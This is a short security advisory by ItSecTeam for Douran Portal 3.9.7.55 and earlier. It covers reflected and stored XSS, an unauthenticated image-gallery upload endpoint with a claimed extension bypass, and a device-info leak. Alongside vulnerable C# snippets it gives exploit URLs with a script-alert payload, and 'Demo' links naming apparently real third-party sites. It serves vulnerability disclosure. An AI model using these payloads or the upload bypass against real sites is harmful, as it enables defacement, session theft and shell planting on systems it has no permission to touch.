Douran Portal versions 3.9.7.55 and below suffer from information disclosure, cross site scripting and shell upload vulnerabilities. The vendor has notified Packet Storm that everything has been fixed as of version 3.9.8.0 in June, 2011.
90d3218d6c7e198e85c53ccc414184159561f5cc9458e34945e363e5cb51b9b7
===========================================================
[+] Douran Portal <= V3.9.7.55 Multiple Remote Vulnerabilities
===========================================================
[+] Author : ItSecTeam
[+] Contact : Bug@itsecteam.com
[+] Site : www.itsecteam.com
[+] Forum : http://forum.itsecteam.com/
[+] Thanks : Amin Shokohi (Pejvak!) , homay
~~~~~~~~~~~~~~~~[Information]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Web App : Douran Portal
[+] Version : Worked In Last Version (V3.9.7.55) And Prior
[+] Software: http://www.douran.com
[+][+][+][+][+][+][+](Vulnerabilities)[+][+][+][+][=][+][+]
[1] Xss None Present :
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.OrderForm
private void Page_Load(object sender, EventArgs e)
{
this.lblTitle.Text = Localize.GetString("ORDER_FOR", "Order form for")
+ " " + base.Request.QueryString["ItemTitle"];
}
Print Request.QueryString["ItemTitle"] Without Check
[~] Secure :
private void Page_Load(object sender, EventArgs e)
{
this.lblTitle.Text = Localize.GetString("ORDER_FOR", "Order form for")
+ " " + CheckString(base.Request.QueryString["ItemTitle"]);
}
[-] End Poc
[#] Exploit :
http://Site.Com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
[*] Demo :
http://isaar.ir/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
[2] Remote File Upload :
[Note] : Worked In Older 3.8.2.2
[~] Poc :
You Can Upload Your File Without Check Authorization
You Can Upload :
string acceptedFiles =
";.jpg;.jpeg;.jpe;.gif;.bmp;.png;.swf;.avi;.ra;.mov;.mpeg;.mpg;.wav;";
You Can Bypass
[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/ftb/ftb.imagegallery.aspx[*]
Demo :http://www.isbn.ir/DesktopModules/ftb/ftb.imagegallery.aspx
[3] Information Leakage Show Device Info :
http://Site.Com/security/DeviceInfo.aspx
[4] Xss Present :
http://Site.Com/security/DeviceInfo.aspx
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.BlogDB
Submit Data Without Check{
blogDB.AddBlogComment(ModuleID, ItemID,
this.txtName.Text,this.txtTitle.Text, this.txtURL.Text,
this.txtComments.Text);
}
public void AddBlogComment(int moduleID, int itemID, string name, string
title, string url, string comment)
{
if (name.Length < 1)
{
name = "unknown";
}
if (title.Length > 100)
{
title = title.Substring(0, 100);
}
if (name.Length > 100)
{
name = name.Substring(0, 100);
}
if (url.Length > 200)
{
url = url.Substring(0, 200);
}
SqlConnection sqlConnectionString = PortalSettings.SqlConnectionString;
SqlCommand command = new SqlCommand("dp_BlogCommentAdd",
sqlConnectionString);
command.CommandType = CommandType.StoredProcedure;
SqlParameter parameter = new SqlParameter("@ModuleID", SqlDbType.Int, 4);
parameter.Value = moduleID;
command.Parameters.Add(parameter);
SqlParameter parameter2 = new SqlParameter("@ItemID", SqlDbType.Int, 4);
parameter2.Value = itemID;
command.Parameters.Add(parameter2);
SqlParameter parameter3 = new SqlParameter("@Name",
SqlDbType.NVarChar, 100);
parameter3.Value = name;
command.Parameters.Add(parameter3);
SqlParameter parameter4 = new SqlParameter("@Title",
SqlDbType.NVarChar, 100);
parameter4.Value = title;
command.Parameters.Add(parameter4);
SqlParameter parameter5 = new SqlParameter("@URL", SqlDbType.NVarChar,
200);
parameter5.Value = url;
command.Parameters.Add(parameter5);
SqlParameter parameter6 = new SqlParameter("@Comment", SqlDbType.NText);
parameter6.Value = comment;
command.Parameters.Add(parameter6);
sqlConnectionString.Open();
command.ExecuteNonQuery();
sqlConnectionString.Close();}
[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx
[-][-][-][-][-][-][-](Vulnerabilities)[-][-][-][-][-][-][-]
~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~